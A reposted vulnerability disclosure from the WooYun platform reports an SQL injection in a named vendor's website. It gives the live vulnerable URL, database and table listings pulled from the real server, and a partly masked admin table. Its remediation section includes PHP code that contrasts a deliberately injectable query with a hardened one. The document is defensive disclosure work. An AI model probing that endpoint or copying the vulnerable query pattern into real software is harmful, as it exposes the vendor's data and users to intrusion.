神刀安全网

Vulnerability title: Another SQL injection in 银禾软件 (Yinhoo Software)

Vulnerability details

Disclosure status:

2016-04-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The database can be queried, including the administrator account and password; passwords are stored in plaintext

Detailed description:

Vulnerable URL:
http://www.yinhoo.com/news.php?id=41

Database:
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] huiwang
[*] information_schema
[*] test
[*] yilinwebdb
[*] yinhoowebdb

Database: huiwang
[25 tables]
+---------------------------+
| user |
| action_log |
| ad_items |
| ad_product |
| adcolumn |
| admin |
| alimama_items |
| apply |
| apply_user_info |
| backend_user_view |
| dictionary |
| image |
| menus |
| menus_score_text |
| product |
| product_columns |
| product_event |
| product_graded_info |
| product_preferential |
| rss_users |
| tag |
| tag_type |
| user_addFavorite_products |
| user_columns |
| visit_log |
+---------------------------+
Database: yilinwebdb
+------------------+---------+
| Table | Entries |
+------------------+---------+
| subscriptioninfo | 1407 |
| menus | 41 |
| news | 14 |
| faqs | 13 |
| banners | 4 |
| clientcommend | 3 |
| webinformation | 3 |
| subscription | 2 |
| `user` | 1 |
+------------------+---------+
Database: yinhoowebdb
+------------------+---------+
| Table | Entries |
+------------------+---------+
| subscriptioninfo | 1642 |
| menus | 98 |
| news | 13 |
| banners | 10 |
| clientcommend | 4 |
| webinformation | 3 |
| subscription | 2 |
| `user` | 1 |
+------------------+---------+
Database: huiwang
Table: admin
[2 entries]
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+
| type_id | admin_id | status_id | password | admin_name | login_email | create_user | create_time | last_update_time | last_update_user |
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+
| 1 | 1 | 0 | *** | hui_admin | [email protected] | NULL | 2013-06-14 14:53:57 | 2013-06-14 14:53:57 | NULL |
| 3 | 42 | 0 | *** | [email protected] | [email protected] | NULL | 2013-06-14 16:07:13 | 2013-06-14 16:07:13 | NULL |
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+

I did not query any further specific data.

Proof of vulnerability:

As above

Remediation:

1. Filter numeric parameters with the intval() function

2. Change the passwords

3. You can also install 安全狗 (SafeDog), 加速乐 (JiaSuLe), or other security software
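As an added example (not the vendor's code, and not taken from the original report), the block below shows the class of bug behind a numeric lookup such as news.php?id=41 and the intval()-based fix from remediation step 1, written for the PHP 5.3 / MySQL stack listed above. The `news` table name appears in the enumeration output; the column names (id, title, body), the mysqli connection and the credentials are assumptions.

```php
<?php
// Added example, not the vendor's code. Illustrates the bug class behind
// news.php?id=41 and the intval() fix from the remediation list.
// The `news` table is listed in the enumeration above; the column names
// (id, title, body), the mysqli connection and the credentials are assumed.

// --- Vulnerable pattern (assumed; shown for contrast only) ---
// The raw query-string value is pasted into the SQL text, so any SQL that
// follows the number is executed by MySQL.
function fetchNewsVulnerable(mysqli $db, $id)
{
    $sql = "SELECT id, title, body FROM news WHERE id = " . $id;
    $result = $db->query($sql);
    return $result ? $result->fetch_assoc() : null;
}

// --- Hardened version (PHP 5.3-compatible, matching the stack above) ---
// 1. intval() coerces the parameter to an integer: "41 UNION ..." becomes 41,
//    "abc" becomes 0. Checking ctype_digit() first makes the rejection
//    explicit instead of silently truncating, which is better for logging.
// 2. The prepared statement binds the value as an integer, so it never
//    becomes part of the SQL text. This is the defence that also works for
//    string parameters, where intval() does not apply.
function fetchNewsHardened(mysqli $db, $rawId)
{
    if (!ctype_digit((string) $rawId)) {
        return null;                      // non-numeric input: reject (log upstream)
    }
    $id = intval($rawId);
    if ($id <= 0) {
        return null;                      // ids start at 1 in this schema (assumed)
    }

    $stmt = $db->prepare("SELECT id, title, body FROM news WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);          // 'i' = integer
    $stmt->execute();
    $stmt->bind_result($outId, $title, $body);
    $row = $stmt->fetch()
        ? array('id' => $outId, 'title' => $title, 'body' => $body)
        : null;
    $stmt->close();
    return $row;
}

// Usage (assumed connection parameters):
// $db = new mysqli('localhost', 'webuser', 'secret', 'yinhoowebdb');
// $rawId = isset($_GET['id']) ? $_GET['id'] : '';
// $article = fetchNewsHardened($db, $rawId);
```

intval() alone stops this particular numeric injection, but the prepared statement is what keeps the fix from depending on every parameter being an integer; applying the same bound-parameter pattern to the string parameters of the other endpoints is the durable version of step 1.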

Copyright notice: when reposting, please credit the source 灰灰灰阔@乌云 (WooYun)
